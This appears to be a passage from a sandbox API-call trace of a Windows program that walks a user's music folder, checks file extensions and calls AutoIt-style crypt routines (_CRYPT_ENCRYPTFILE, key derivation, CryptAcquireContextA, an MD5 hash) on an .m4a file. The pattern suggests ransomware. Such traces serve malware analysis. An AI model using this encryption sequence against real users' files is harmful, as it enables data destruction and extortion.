[0181.223] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.223] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0181.223] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0181.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0181.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0181.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0181.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0181.223] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.223] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.224] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.224] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.m4a", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ba16f30, ftCreationTime.dwHighDateTime=0x1d5e592, ftLastAccessTime.dwLowDateTime=0xefe21660, ftLastAccessTime.dwHighDateTime=0x1d5d85c, ftLastWriteTime.dwLowDateTime=0xefe21660, ftLastWriteTime.dwHighDateTime=0x1d5d85c, nFileSizeHigh=0x0, nFileSizeLow=0xef06, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="cEm-bR.m4a", cAlternateFileName="")) returned 0x90add8 [0181.225] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0181.225] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.225] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.m4a", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ba16f30, ftCreationTime.dwHighDateTime=0x1d5e592, ftLastAccessTime.dwLowDateTime=0xefe21660, ftLastAccessTime.dwHighDateTime=0x1d5d85c, ftLastWriteTime.dwLowDateTime=0xefe21660, ftLastWriteTime.dwHighDateTime=0x1d5d85c, nFileSizeHigh=0x0, nFileSizeLow=0xef06, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="cEm-bR.m4a", cAlternateFileName="")) returned 0x90add8 [0181.226] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0181.226] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\ETYJoLZsQISXnK0OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\ETYJoLZsQISXnK0OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\ETYJoLZsQISXnK0OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\ETYJoLZsQISXnK0OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\ETYJoLZsQISXnK0OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ETYJoLZsQISXnK0OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ETYJoLZsQISXnK0OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TYJoLZsQISXnK0OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YJoLZsQISXnK0OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JoLZsQISXnK0OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oLZsQISXnK0OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LZsQISXnK0OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZsQISXnK0OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sQISXnK0OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QISXnK0OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISXnK0OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SXnK0OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XnK0OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nK0OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K0OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OL\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cEm-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Em-bR.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.228] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.228] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0181.228] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0181.228] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0181.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0181.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0181.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0181.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0181.229] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0181.229] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0181.229] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0181.229] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0181.229] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.229] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.m4a", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ba16f30, ftCreationTime.dwHighDateTime=0x1d5e592, ftLastAccessTime.dwLowDateTime=0xefe21660, ftLastAccessTime.dwHighDateTime=0x1d5d85c, ftLastWriteTime.dwLowDateTime=0xefe21660, ftLastWriteTime.dwHighDateTime=0x1d5d85c, nFileSizeHigh=0x0, nFileSizeLow=0xef06, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="cEm-bR.m4a", cAlternateFileName="")) returned 0x90af58 [0181.229] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0181.229] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.229] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0181.229] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.229] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0181.229] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0181.229] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.230] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0181.230] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.230] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.230] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0181.230] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0181.230] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0181.230] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.230] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.230] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.230] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0181.230] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.230] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0181.231] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.232] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.232] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0181.232] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0181.232] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0181.232] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.232] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.232] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.232] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0181.232] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0181.232] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0181.232] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.232] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.232] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.232] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.232] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0181.232] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.232] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.232] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0181.233] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0181.233] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0181.233] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0181.233] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0181.233] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0181.233] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0181.233] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0181.233] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0181.233] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0181.233] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.233] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.233] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.233] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0181.233] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0181.233] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0181.233] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.234] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0181.234] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.234] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.234] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.234] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, 